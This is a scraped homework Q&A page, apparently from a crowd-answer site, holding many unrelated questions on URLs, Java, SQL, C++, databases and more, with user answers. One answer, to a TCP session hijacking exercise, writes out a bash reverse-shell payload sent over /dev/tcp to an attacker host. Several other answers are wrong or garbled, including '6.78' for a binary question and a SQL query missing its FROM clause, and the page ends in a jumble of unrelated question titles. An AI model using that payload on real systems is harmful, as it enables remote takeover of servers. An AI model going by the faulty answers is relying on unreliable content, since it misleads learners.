can anyone help???

Consider the following website URL: http://www.briannasblog.com. What
does the "http://" represent?
A. FTP
B. Resource name
C. Protocol identifier
O D. Domain name

Can Anyone Help??? Consider The Following Website URL: Http://www.briannasblog.com. Whatdoes The "http://"

Answers

Answer 1

Answer: Protocol identifier

Explanation:

Just took the test and resource name was incorrect. Hope this helps :)

Answer 2

Consider the following website URL: http://www.briannasblog.com. The the "http://" represent the Protocol identifier. Thus, option C is correct.

What is the role of the parts of the  Uniform Resource Locator?

The resource name has been known as or it  have the URL which has the name of the protocol that has been required for one to be able to gain entrance to a resource,

The protocol identifier has been known to be where the URL known which protocol to be used  as the form of the primary entrance means. It has been known to the identify the IP address or domain name.The two part of the Uniform Resource Locator are protocol identifier and the resource name.

A subdirectory has the directory within the directory, which has been used to organize files and other directories. The URL can be broken down into two main parts: the domain name.

Therefore,  two part of the Uniform Resource Locator are protocol identifier and the resource name.

Learn more about Uniform Resource on:

https://brainly.com/question/30074834

#SPJ7


Related Questions

Which number system is based on 1s and 0s? Binary Decimal Digital Whole

Answers

Answer:

6.78

Explanation:

Answer:

Binary Number System

Explanation:

binary number is a number expressed in base 2 numeral system for binary numeral system, a method of mathematical expression which uses only two systems: typically 0 and 1.

Which of these actions will help build relationships with customers : A. Empowering employees to provide the best service possible B. Make follow- up calls after service transactions C. Ask for customer opinions on possible improvements D. all of the above

Answers

Answer: D. all of the above

Explanation:

Customers want to be provided with good service when they shop so it is important that employees are able to do so and they can only do so if they have the tools required. The company should therefore make those tools available thereby empowering employees to provide great service.

Making follow-up calls to customers after they receive a service to check if the service is working out will build customer relations because they will feel that the company cares. Finally, asking customers of their opinions on improvements needed makes them feel they have a voice and will go a long way in establishing rapport with them.

The following implementations of the method reverse are intended to reverse the o rder of the elements in a LinkedList.

I.
public static void reverse (LinkedList alist)( LinkedList temp = new LinkedList (); while (aList.size ()>0) temp.addLast (aList.removeFirst ) aList.addFirst (temp.removeFirst ) while (temp.size ()> o)
II.
public static void reverse (LinkedList alist) while (aList.size () >0) while (Itemp.isEmpty 0) QueuecSomeType> temp new LinkedList 0: temp.add (alist.removeFirst ()): aList.addFirst (temp.remove ():

IlI.
public static void reverse (LinkedList alist) while (aList.size ()>0) while (Itemp.isEmpty()) Stack temp new Stack ( temp.push (aList.removeLast ()) aList.addFirst (temp.pop ());

Which of the choices above perform the intended task successfully? Why?

a. I only
b. Il only
c. Ill only
d. Il and Ill only
e. I, ll, and IlI

Answers

Answer:

c. Ill only

Explanation:

All of the code snippets provided are missing small details such as brackets in the correct places and '=' to signal an assignment. These are crucial when coding in Java and the code will not run without it. Regardless, the only implementation that is correct in the options would be implementation III. It is the only code snippet that is correctly structured to reverse the order of the elements. It will still need debugging in order to get it to work.

IlI.

public static void reverse (LinkedList alist) while (aList.size ()>0) while (Itemp.isEmpty()) Stack temp new Stack ( temp.push (aList.removeLast ()) aList.addFirst (temp.pop ());

Construct a SQL query that displays a list of colleges, their sity/state, the accrediting agency, and whether or not the school is distance only. Only show the first 10 records.

Answers

Answer:

SELECT college, city_state, accre_agency, distance LIMIT 10

Explanation:

Given

Table name: College

See attachment for table

Required

Retrieve top 10 college, state, agency and school distance from the table

To retrieve from a table, we make use of the SELECT query

The select statement is then followed by the columns to be selected (separated by comma (,))

So, we have:

SELECT college, city_state, accre_agency, distance

From the question, we are to select only first 10 records.

This is achieved using the LIMIT clause

i.e. LIMIT 10 for first 10

So, the complete query is:

SELECT college, city_state, accre_agency, distance LIMIT 10

A digital computer has a memory unit with 16 bits per word. The instruction set consists of 72 different operations. All instructions have an operation code part(opcode) and an address part(allowing for only one address). Each instruction is stored in one word of memory.

Required:
a. How many bits are needed for the opcode?
b. How many bits are left for the address part of the instruction?
c. What is the maximum allowable size for memory?
d. What is the largest unsigned binary number that can be accommodated in one word of memory?

Answers

Answer:

a. 7 bits b. 9 bits c. 1 kB d. 2¹⁶ - 1

Explanation:

a. How many bits are needed for the opcode?

Since there are 72 different operations, we require the number of bits that would contain 72 different operations. So, 2ⁿ ≥ 72

72 = 64 + 8 = 2⁶ + 8

Since n must be an integer value, the closest value of n that would contain 72 different operations is n = 7. So, 2⁷ = 128

So, we require 7 bits for the opcode.

b. How many bits are left for the address part of the instruction?

bits left = bits per word - opcode bit = 16 - 7 = 9 bits

c. What is the maximum allowable size for memory?

Since there are going to be 2⁹ bits to addresses each word and 16 bits  for each word, the maximum allowable size for memory is thus 2⁹ × 16 = 512 × 16 = 8192 bits.

We convert this to bytes

8192 bits × 1 byte/8 bits = 1024 bytes = 1 kB

d. What is the largest unsigned binary number that can be accommodated in one word of memory?

Since the number go from 0 to 2¹⁶, the largest unsigned binary number that can be accommodated in one word of memory is thus

2¹⁶ - 1

Write the following function without using the C++ string class or any functions in the standard library, including strlen(). You may use pointers, pointer arithmetic or array notation.Write the function lastOfAny().The function has two parameters (str1, str2), both pointers to the first character in a C-style string.You should be able to use literals for each argument.The function searches through str1, trying to find a match for any character inside str2.Return the index of the last character in str1 where this occurs.

Answers

Answer:

The function in C++ is as follows

int chkInd(string str1, string str2){    

int lenstr1=0;

while(str1[lenstr1] != '\0'){  lenstr1++;  }

int index = 0; int retIndex=0;

for(int i=lenstr1-1;i>=0; i--){

   while (str2[index] != '\0'){

       if (str1[i] == str2[index]){

           retIndex=1;

           break;         }

       else{   retIndex=0;      }

  index++;    }

  if (retIndex == 0){   return i;   }else{return -1;}}

}

Explanation:

This defines the function

int chkInd(string str1, string str2){    

First, the length of str1 is initialized to 0

int lenstr1=0;

The following loop then calculates the length of str1

while(str1[lenstr1] != '\0'){  lenstr1++;  }

This initializes the current index and the returned index to 0

int index = 0; int retIndex=0;

This iterates through str1

for(int i=lenstr1-1;i>=0; i--){

This loop is repeated while there are characters in str2

   while (str2[index] != '\0'){

If current element of str2 and str1 are the same

       if (str1[i] == str2[index]){

Set the returned index to 1

           retIndex=1;

Then exit the loop

           break;         }

If otherwise, set the returned index to 0

       else{   retIndex=0;      }

Increase index by 1

  index++;    }

This returns the calculated returned index; if no matching is found, it returns -1

  if (retIndex == 0){   return i;   }else{return -1;}}

}

Identify the logic error in the code below. The code is supposed to display a single message “child”, “adult” or “senior” for any value of age:

if (age < 18) {
System.out.println("child");
} else if (age >= 18) {
System.out.println("adult");
} else if (age > 65) {
System.out.println("senior");
}
Question 1 options:

a)

no message for age = 65

b)

too many messages for age = 18

c)

no message for age < 65

d)

message “senior” will never be displayed

Answers

If we take a look at the first else if block, the code runs whenever the age is greater than or equal to 18. This means that senior will never be displayed. Answer choice D is correct.

Another method that might be desired is one that updates the Goalie's jerseyNumber. This method will receive a new number of Jersey and set this number to the Goalie's current jerseyNumber. What methods would accomplish this?

Answers

Answer:

A setter method

Explanation:

A setter method will accomplish this. A setter method is a method that takes in a value as an argument and grabs an object's instance variable and modifies it with the value passed as an argument. In this scenario, the argument value would be the current JerseyNumber. The setter method will grab the object's jerseyNumber variable and change its value to be the value of the passed argument. Setter methods are common practice in all object classes as well as the getter methods to retrieve instance variables.

Consider the class of C of languages over {0,1}*such that L is in C if the complement of L is finite. For each of the following answer yes or no, thenjustify your answer.(Add more lines if necessary.) A sample language in C is the set of all bit strings other than 001 and 110. A sample language not in C is the set of all bit strings of even length.

a. Is C closed under intersection?
b. Is C closed under complementation
c. Is C closed under union?

Answers

Answer:

a)  Yes

b) No

c) Yes

Explanation:

a) C is closed under intersection  ( Yes )

To justify my answer lets consider two languages : C1 and C2 are in C

C1 ∩ C2 has a complement of  C'1 ∪ C'2  which will be finite which shows that C will be closed under complement

B) C is not closed under complementation ( NO )

because Complement of C1 in language C  is C'1  which will be finite while the complement of  C'1 which is C1 is not finite hence C will not be closed under complementation

C) C is closed under union ( Yes )

The color in a circle is a _____________ data type.

Answers

Answer:

b

Explanation:

I wish we could visit Paris for the holidays into exclamatory​

Answers

Answer:

wdym

Explanation:

You want to visit Paris ? Tbh is sould fun and interesting

There is an active Telnet connection from a client (10.0.2.5) to a Telnet server(10.0.2.9). The server has just acknowledged a sequence number1000, and the client has just acknowledged a sequence number 3000. An attacker wants to launch the TCP session hijacking attack on the connection, so he can execute a command on the server. He is on the same local area network as these two computers. You need to construct a TCP packet for the attacker. Please fill in the following fields:
• Source IP and Destination IP
• Source port and Destination port
• Sequence number
• The TCP data field.

Answers

Answer:

Answer is mentioned below.

Explanation:

Source IP and Destination IP: 10.0.2.5, 10.0.2.9 Source port and Destination port: for source port, we need to sniffer a packet in this  Sequence number: 3001 The TCP data field: “/bin/bash –l > /dev/tcp/10.0.20/9090 2>&1 0<&1”

I hope you find the answer helpful. All the codes are correctly mentioned. Thanks

The maximum-valued element of an integer-valued array can be recursively calculated as follows: If the array has a single element, that is its maximum (note that a zero-sized array has no maximum) Otherwise, compare the first element with the maximum of the rest of the array-- whichever is larger is the maximum value. Write an int function named max that accepts an integer array, and the number of elements in the array and returns the largest value in the array. Assume the array has at least one element.

Answers

Solution :

#include <iostream>

using namespace std;

//Function Declaration

int max(int arr[],int size);

int main()

{

//Declaring variable

int size;

 

while(true)

{

cout<<"Enter the no of elements in the array :";

cin>>size;

if(size<=0)

{

  cout<<"Invalid.Must be greaterthan Zero"<<endl;

  continue;

  }

  else

  break;

  }

 

//Creating an array

int arr[size];

/* getting the inputs entered by

* the user and populate them into array

*/

for(int i=0;i<size;i++)

{

cout<<"Enter element#"<<i+1<<":";

cin>>arr[i];

}

//calling function

int maximum=max(arr,size);

//Displaying the output

cout<<"The maximum Element in the Array is :"<<maximum<<endl;

return 0;

}

/* Function implementation which finds

* the maximum element in the array and return it

*/

int max(int arr[],int size)

{

//Declaring the static variables

static int k=0,maximum=-999;

 

/* This if block will execute only if the value of k

* is less than the size of an array

*/

if(k==size-1)

{

   return arr[0];

  }

else if(size-1>k)

{

if(arr[k]>maximum)

maximum=arr[k];

 

//Incrementing the k value

k++;

 

//Calling the function

max(arr,size);

}

return maximum;

}

**GIVING ALL POINTS** 4.02 Coding With Loops
I NEED THIS TO BE DONE FOR ME AS I DONT UNDERSTAND HOW TO DO IT. THANK YOU

Output: Your goal

You will complete a program that asks a user to guess a number.


Part 1: Review the Code

Review the code and locate the comments with missing lines (# Fill in missing code). Copy and paste the code into the Python IDLE. Use the IDLE to fill in the missing lines of code.


On the surface this program seems simple. Allow the player to keep guessing until he/she finds the secret number. But stop and think for a moment. You need a loop to keep running until the player gets the right answer.


Some things to think about as you write your loop:


The loop will only run if the comparison is true.

(e.g., 1 < 0 would not run as it is false but 5 != 10 would run as it is true)

What variables will you need to compare?

What comparison operator will you need to use?

# Heading (name, date, and short description) feel free to use multiple lines


def main():


# Initialize variables

numGuesses = 0

userGuess = -1

secretNum = 5


name = input("Hello! What is your name?")


# Fill in the missing LOOP here.

# This loop will need run until the player has guessed the secret number.


userGuess = int(input("Guess a number between 1 and 20: "))


numGuesses = numGuesses + 1


if (userGuess < secretNum):

print("You guessed " + str(userGuess) + ". Too low.")


if (userGuess > secretNum):

print("You guessed " + str(userGuess) + ". Too high.")


# Fill in missing PRINT statement here.

# Print a single message telling the player:

# That he/she guessed the secret number

# What the secret number was

# How many guesses it took


main()

Part 2: Test Your Code

Use the Python IDLE to test the program.

Using comments, type a heading that includes your name, today’s date, and a short description.

Run your program to ensure it is working properly. Fix any errors you observe.

Example of expected output: The output below is an example of the output from the Guess the Number game. Your specific results will vary based on the input you enter.


Output


Your guessed 10. Too high.

Your guessed 1. Too low.

Your guessed 3. Too low.

Good job, Jax! You guessed my number (5) in 3 tries!




When you've completed filling in your program code, save your work by selecting 'Save' in the Python IDLE.


When you submit your assignment, you will attach this Python file separately.


Part 3: Post Mortem Review (PMR)

Using complete sentences, respond to all the questions in the PMR chart.


Review Question Response

What was the purpose of your program?

How could your program be useful in the real world?

What is a problem you ran into, and how did you fix it?

Describe one thing you would do differently the next time you write a program.

Answers

Answer:

import random

from time import sleep as sleep

 

def main():

   # Initialize random seed

   random.seed()

 

   # How many guesses the user has currently used

   guesses = 0

   

   # Declare minimum value to generate

   minNumber = 1

 

   # Declare maximum value to generate

   maxNumber = 20

 

   # Declare wait time variable

   EventWaitTime = 10 # (Seconds)

 

   # Incorrect config check

   if (minNumber > maxNumber or maxNumber < minNumber):

       print("Incorrect config values! minNumber is greater than maxNumber or maxNumber is smaller than minNumber!\nDEBUG INFO:\nminNumber = " + str(minNumber) + "\nmaxNumber = " + str(maxNumber) + "\nExiting in " + str(EventWaitTime) + " seconds...")

       sleep(EventWaitTime)

       exit(0)

 

   # Generate Random Number

   secretNumber = random.randint(minNumber, maxNumber)

 

   # Declare user guess variable

   userGuess = None

 

   # Ask for name and get input

   name = str(input("Hello! What is your name?\n"))

 

   # Run this repeatedly until we want to stop (break)

   while (True):

 

       # Prompt user for input then ensure they put in an integer or something that can be interpreted as an integer

       try:

           userGuess = int(input("Guess a number between " + str(minNumber) + " and " + str(maxNumber) + ": "))

       except ValueError:

           print("ERROR: You didn't input a number! Please input a number!")

           continue

 

       # Increment guesses by 1

       guesses += 1

 

       # Check if number is lower, equal too, or higher

       if (userGuess < secretNumber):

           print("You guessed: " + str(userGuess) + ". Too low.\n")

           continue

       elif (userGuess == secretNumber):

           break

       elif (userGuess > secretNumber):

           print("You guessed: " + str(userGuess) + ". Too high.\n")

           continue

   

   # This only runs when we use the 'break' statement to get out of the infinite true loop. So, print congrats, wait 5 seconds, exit.

   print("Congratulations, " + name + "! You beat the game!\nThe number was: " + str(secretNumber) + ".\nYou beat the game in " + str(guesses) + " guesses!\n\nThink you can do better? Re-open the program!\n(Auto-exiting in 5 seconds)")

   sleep(EventWaitTime)

   exit(0)

 

if __name__ == '__main__':

   main()

Explanation:

Answer:

numGuesses = 0

userGuess = -1

secretNum = 4

name = input("Hello! What is your name?")

while userGuess != secretNum:

  userGuess = int(input("Guess a number between 1 and 20: "))

  numGuesses = numGuesses + 1

  if (userGuess < secretNum):

      print(name + " guessed " + str(userGuess) + ". Too low.")

  if (userGuess > secretNum):

      print( name + " guessed " + str(userGuess) + ". Too high.")

  if(userGuess == secretNum):

     print("You guessed " + str(secretNum)+ ". Correct! "+"It took you " + str(numGuesses)+ " guesses. " + str(secretNum) + " was the right answer.")

Explanation:

Review Question Response

What was the purpose of your program?  The purpose of my program is to make a guessing game.  

How could your program be useful in the real world?   This can be useful in the real world for entertainment.

What is a problem you ran into, and how did you fix it?   At first, I could not get the input to work. After this happened though, I switched to str, and it worked perfectly.

Describe one thing you would do differently the next time you write a program.  I want to take it to the next level, like making froggy, tic tac toe, or connect 4

Newton's method has the advantage of having a faster quadratic convergence rate over the other methods such as Secant and bisection methods.

a. True
b. False

Answers

Answer:

a. True

Explanation:

The Newton's method (Newton-Raphson method) used in advanced statistical computing can be used for a continuous and differentiable function that can be approximated by a straight line tangent to it. It requires the derivative of the function to be known, Newton's method converges faster that is whenever it converges. Newton Raphson Method has quadratic convergence which is faster, and the quadratic convergence makes the error in the next iteration increase by the square of the value of the previous iteration.

how do you design and create video games for what console game That you want To have it in

Answers

Answer

Making a video game is much less daunting than it might seem. While you likely aren’t going to go from having no experience to making the next Grand Theft Auto, it has actually never been easier to get started making games. Game development tools and resources have become increasingly accessible to the average person, even if they have no programming experience. Often these tools are also available for free.

To try to make things easier for those looking to get started making games, we’ve put together a list of 11 game engines / editors. Some are designed for a specific genre of game or to be incredibly easy for newcomers. Others are professional development tools for AAA games, but are effectively free to use for hobbyists and still offer a lot of learning tools to help those with limited programming experience get started.

There are, of course, a lot of things that go into game development — music, animation, sound, writing, texturing, modeling, etc. — however, the game engine / editor you choose is going to have the biggest effect on what kind of game you can make. If you have suggestions for other engines, software, or learning tools for the other aspects of development, post it in the comments.

A database designer wants to create three tables: Supplier, Product, and Country. The Supplier table has a Countryld column with values that must appear in the Country table's Countryld column. The Product table has an auto-increment column.
Which table's CREATE TABLE statement(s) must specify a FOREIGN KEY?
a. Supplier
b. Product
c. Country
d. Supplier and Country

Answers

Answer:

(a) Supplier

Explanation:

In database design, two tables are linked together using a FOREIGN KEY. A foreign key is formed from one or more columns of one table that reference or match another key (often called a primary key) in another table. In other words, when a column or a combination of columns on one table points to a primary key of another table, the column(s) will specify the foreign key.

PS: A primary key is used to make each entry of a table unique.

In the given tables - Supplier, Product, Country -  since the Supplier table has a column called CountryId referencing the CountryId column of the Country table, then CountryId is a primary key in Country table but a foreign key in Supplier table.

Therefore, the CREATE TABLE statement(s) of the Supplier table must specify a foreign key.

A database management system often reads and writes data in a database, and makes sure there is consistency and availability. The supplier table's CREATE TABLE statement(s) must specify a FOREIGN KEY.

The database system often guards data when a lot of transactions is taking place.   it often hinders multiple transactions with the same data at the same time.

The Select SQL statement does not alter any database data. A supplier database is made up of different list of service, product or materials providers who can meet orders quickly.

Learn more from

https://brainly.com/question/15281828

Which of the following statements are true about using a high-level programming language instead of a lower-level language?
I. Programs written in a high-level language are generally easier for people to read than programs written in a low-level language.
II. A high-level language provides programmers with more abstractions than a low-level language.
III. Programs written in a high-level language are generally easier to debug than programs written in a low-level language.

Answers

Answer:

I. Programs written in a high-level language are generally easier for people to read than programs written in a low-level language.

II. A high-level language provides programmers with more abstractions than a low-level language.

III. Programs written in a high-level language are generally easier to debug than programs written in a low-level language.

Explanation:

High level language can be defined as a programming language which is generally less complex than a machine (low level) language and easy to understand by the end users (programmers).

This ultimately implies that, a high level programming language is typically a user friendly language and as such simplifies coding or programming for beginners.

Some examples of high level programming language are Python, Java, C#, Ruby, Perl, Visual Basic, PHP, Cobol, C++, Fortran, Javascript, etc.

Machine and assembly are referred to as a low level programming language used in writing software programs or applications with respect to computer hardware and architecture. Machine language is generally written in 0s and 1s, and as such are cryptic in nature, making them unreadable by humans. Also, assembly language use commands written in English such as SUB, MOV, ADD, etc.

Hence, the following statements are true about using a high-level programming language rather than use a lower-level language;

I. Any software application or program that is written in a high-level programming language instead of a low-level programming language, is generally easy to read and even for non-programmers.

II. A high-level language makes writing a code easier and convenient for programmers than a low-level programming language because it offers more abstraction from the computer, through the use of a higher order functions.

III. It is easier and less cumbersome for programmers to debug or find errors in programs written in a high-level language than programs written using a low-level programming language.

A high-level programming langue is one that which are a hard abstraction from the computer details. In contrast, the lower, level programming is one that has natural language elements and is easier to use.

The high-level programming language is easier for people to read as they have a lower-level language. The high-level languages have more abstractions than the lower-level ones. These languages are easier to debug than programs in lower levels.

Hence all of the above are correct.

Learn more about the statements that are true about using a high-level.

brainly.com/question/11566221.

what is a web client ​

Answers

Answer:

Web client:

it is an application(web browser,program etc ) that requests for service from a web server.

stay safe healthy and happy

Write a function NumberOfPennies() that returns the total number of pennies given a number of dollars and (optionally) a number of pennies. Ex: 5 dollars and 6 pennies returns 506.
Sample program:
#include
using namespace std;

int main() {
cout << NumberOfPennies(5, 6) << endl; // Should print 506
cout << NumberOfPennies(4) << endl; // Should print 400
return 0;

Answers

Answer:

Following are the code to the given question:

#include <iostream>//header file  

using namespace std;

int NumberOfPennies(int ND, int NP=0)//defining a method that accepts two parameters  

{

return (ND*100 +NP);//use return keyword that fist multiply by 100 then add the value  

}

int main() //main method

{

cout << NumberOfPennies(5,6) << endl; // Should print 506

cout << NumberOfPennies(4) << endl; // Should print 400

return 0;

}

Output:

506

400

Explanation:

In the method "NumberOfPennies" it accepts two parameters that are "ND and NP" that uses the return keyword that multiply 100 in ND variable and add in NP variable and return its values.

In the main method it it uses the cout method that call the by accepts value in parameter and print its value.

How do cyber criminals target user’s end devices?

Answers

Answer: they hack in your device and change all your passwords so that so you can’t get in maybe i don’t know

Explanation:

They hack into the account and start messing with people

Why is it best to serve cheese with plain breads or crackers?

Answers

Answer:Here's why it works: Club crackers are engineered to be the perfect amount of buttery and salty, which means that, sometimes, they're all you can taste if paired with the wrong cheese.

Explanation:

What is the output when you run the following program? print(3 + 7) print("2 + 3") 10 2 + 3 3 + 7 5 3 + 7 2 + 3 10 5

Answers

Answer:

10

2 + 3

Explanation:

The statement ;

print(3 + 7) will give the output 10 ; by cause we are using the print command to display the result of the integer sum of 3 and 7 which is 10

The other statement print("2 + 3") will give the output 2 + 3. This is because by wrapping the statement within quotation marks, the programming language sees it as a string rather Than an integer on which a mathematical operation can be performed. Hence it prints what is written within the quotation marks.

Electronically, or on paper draw a Binary Search Tree using the values below. Note: Insert each value into the tree in order from left to right following the procedure discussed in class.
25, 14, 7, 32, 27, 2, 29,9,35
On a separate electronic page or sheet of paper:
1. List the values using in order traversal
2. List the values using pre-order traversal
3. List the values using post-order traversal

Answers

Answer:

A.)  in order traversal - 9 32 35 14 27 25 2 7 29

B.) pre-order traversal - 25 14 32 9 35 27 7 2 29

C.) post-order traversal - 9 35 32 27 14 2 29 25

Explanation:

Given - 25, 14, 7, 32, 27, 2, 29,9,35

To find - On a separate electronic page or sheet of paper:

1. List the values using in order traversal

2. List the values using pre-order traversal

3. List the values using post-order traversal

Proof -

Given values are -

25, 14, 7, 32, 27, 2, 29,9,35

1.)

In order is -

9 32 35 14 27 25 2 7 29

2.)

Pre-order is - (Root left right)

List nodes of first time visit

25 14 32 9 35 27 7 2 29

3.)

Post-order is - (Left Right Root)

List nodes of third time visit

9 35 32 27 14 2 29 25

The moment that S-locks are released will determine:__________

a. The granularity of locks
b. The compliance with ACID
c. The look-ahead logging strategy
d. The anomalies that can happen

Answers

Answer:

A.

Explanation:

In computer science, the selection of a lockable device is an essential consideration in the creation of a database management system.

Granularity locking is a locking technique that is applied in database management systems (DBMS) as well as relational databases. The granularity of locks corresponds to how much data is locked at once, and it is determined when S lock (Shared Locks) are released.

The moment that S-locks are released will determine the granularity of locks (Option a).

A lock can be defined as a procedure capable of enforcing limits on access to a particular resource when there exist many threads of execution.

Multiple granularity locking (abbreviated as MGL) is a locking strategy employed in database management systems and also in relational databases.

This strategy (multiple granularity locking) is often used in order to ensure serializability.

In conclusion, the moment that S-locks are released will determine the granularity of locks (Option a).

Learn more in:

https://brainly.com/question/15691389

melissa created a brochure for fashion fabrics with this image. wich design elements are significant in this image

Answers

Answer:

Texture is very prominent in the image. The other elements are

_Shape_ and _Color_.

Explanation:

If we were to look through our choices, space doesn't make sense as there is no clear distinction between foreground, middle ground, and background. It's not form because the image shown shows no manipulation of light that would make the subject of the image look realistic.

- 2021 Edmentum

Texture stands extremely prominent in the image. The other features exist

Shape and Color.

What are the significant elements in the image?

Texture stands extremely prominent in the image. The other features exist

Shape and Color.

If we were to look through our choices, space doesn't create sense as there exists no clear difference between foreground, central ground, and background. It's not constituted because the picture shown delivers no manipulation of light that would cause the subject of the picture to look realistic.

According to each line style (fiber, natural fiber, cotton, recycled plastic, silk), you can design various clothes and styles. Harmony happens when the overall design, garment, or ensemble performs visible unity.

To learn more about significant elements in the image

https://brainly.com/question/13581860

#SPJ2

Holding all else constant a higher price for ski lift tickets would be expected to

Answers

Answer:

answer is below

Explanation:

decrease the number of skis sold

what will be the output? need answer fast!
What will be the output? class num: def init_ (self, a): self.number = a def add_ (self, b): return self.number + 2 * b.number # main program numA = num (3) numB = num (2) result = numA + numB print (result) O 5 O 2 O 7 O 3

Answers

Answer:

your answer would be 7.0 my guy

Explanation:

i took the final

A photographer is reading about how to ensure a high-quality photographic print. Which statements convey the best way to ensure the results the photographer is looking for? You’ll need to follow some basic steps to print a good-quality photograph. The image you choose will depend on the purpose of the print. You can edit the image to enhance different aspects of the photograph. However, most edits are complicated and you should minimize them if possible. After editing, you may need to resize the photograph to fit the paper size. Your choice of photographic paper and printer does not affect the outcome much; it only determines the speed at which an image can print. You should make a test print after you modify and resize an image. This way, if there is a problem, you can make further modifications to suit the printer and paper. Check your final image, settings, size, and orientation before printing the final photo. After you obtain a satisfactory test print, you can load the printer tray with paper and make the final print. You can transfer and handle a printed image immediately.

Answers

Answer:

B

Explanation:

It might be or not

Character positions in
arrays start counting with
the number 1.
True
False

Answers

Answer:

False.

Explanation:

A data dictionary can be defined as a centralized collection of information on a specific data such as attributes, names, fields and definitions that are being used in a computer database system.

In a data dictionary, data elements are combined into records, which are meaningful combinations of data elements that are included in data flows or retained in data stores.

This ultimately implies that, a data dictionary found in a computer database system typically contains the records about all the data elements (objects) such as data relationships with other elements, ownership, type, size, primary keys etc. This records are stored and communicated to other data when required or needed.

In Computer programming, an array can be defined as data structure which comprises of a fixed-size collection of variables each typically holding a piece of data and belonging to the same data type such as strings or integers.

This ultimately implies that, when a programmer wishes to store a group of related data (elements) of the same type, he or she should use an array.

Generally, character positions in arrays start counting with the number 0 not 1.

Hence, an array uses a zero-based indexing and as such the numbering or position of the characters (elements) starts from number 0. Thus, the first character (element) in an array occupies position zero (0), the second number one (1), the third number two (2) and so on.

Other Questions
Suppose $1000 is invested at 8%, compounded quarterly. How much is in the account at the end of 4 years? QUICK I WILL CHOSE THE BRAILESTThe Treaty of Torsedillas divided the world between Spain and Portugal.1. Hundred Years' War2. Line of Demarcation3. Aztec conquest 4. Italian Wars5. Rise of Turks 6. Magellan's voyage Please help me I really need help How much water should you drink a day to maintain a healthy water balance? 5-6 pints 5-6 cups 6-8 pints 6-8 cups Hi everyone I have a introduction discussion board post to do (hate em) and I have to reply to a student, heres what the student says: Hello! everybody my name is ( not going to put their name). I am from Mexico and I am studying for becoming an architect. I am excited about this new semester at HCC, and wish everyone can reach your goals. it is nice to meet you. Can someone give me 3-4 sentences to reply to this? thank you. if smooth spherical ball of brass material having a radius of 3mm fall through certainliquid having coefficient of viscosity of 8x 10'NS/m. If the density of the brass material is 8.6 x10 kg/m', estimate its terminal velocity+)? Assume that the density of the liquid is 5.7x10'kg/m. In June, the most northern parts of earth get? B.1. Name the triangles that are congruent.2. What postulate support your answer?3. Name all other angles and segments that are congruent.4. What can you say about UN in relation to Decrease 2123 by 8%Give your answer rounded to 2 DP HELP PLS NO LINKS I BEEN STUCK FOR 2 HOURS Algebra 1No links Answer fast write an article in 100 words about "what life will be in the future? The US is bordered on the north by _________, on the South by _________, on the east by ________, and on the west by ___________.The mountains that dominate the eastern part of the USA are the ---------- Mountains.The mountains that dominate the western part of the USA are the _______ Mountains.The most important river in the USA which roughly separates the eastern and western USA is the ________ River.There were _________original British colonies in America.Name these original colonies:America declared its independence on (date) _______The first president of the United States was __________What is the capital of the United States? ___________There are ______ stripes and ______stars on the flag of the United States.Who wrote the Declaration of Independence?There are _____ branches of the federal government.The Bill of Rights is the first ____ amendments to the US Constitution.Freedom of speech, freedom of religion and freedom of the press are all guaranteed by the _____Amendment.The Father of the US Constitution is ___________.President _______________s Indian Removal Act led to the tragic event known as the ________.______________ was the justification for the Westward expansion of the USA.The US Civil War was fought over states rights, sectionalism, and ________.The US Civil War was fought between the ________ states and the ______ states. The 13th Amendment to the Constitution banned ______ in the country. Was Martin Van Buren's presidency a failure? Explain your answer. if you answer this with a detailed response ill give u brainliest Which of the following describes the correct relationship between nephron function and blood pressure? Write the slope-intercept form of the equation of each line. 3x 2y = 16 2) 13x 11y = 12 Consider the relationship 5r+8t=10 A. write the relationship as a function r=f(t) B. Evaluate f(-5) C. solve f(t)= 26 The question is in photo match each part of the heart with the correct label Explain how to determine the x- and y- intercepts of a line from a given equation in y = mx + b form.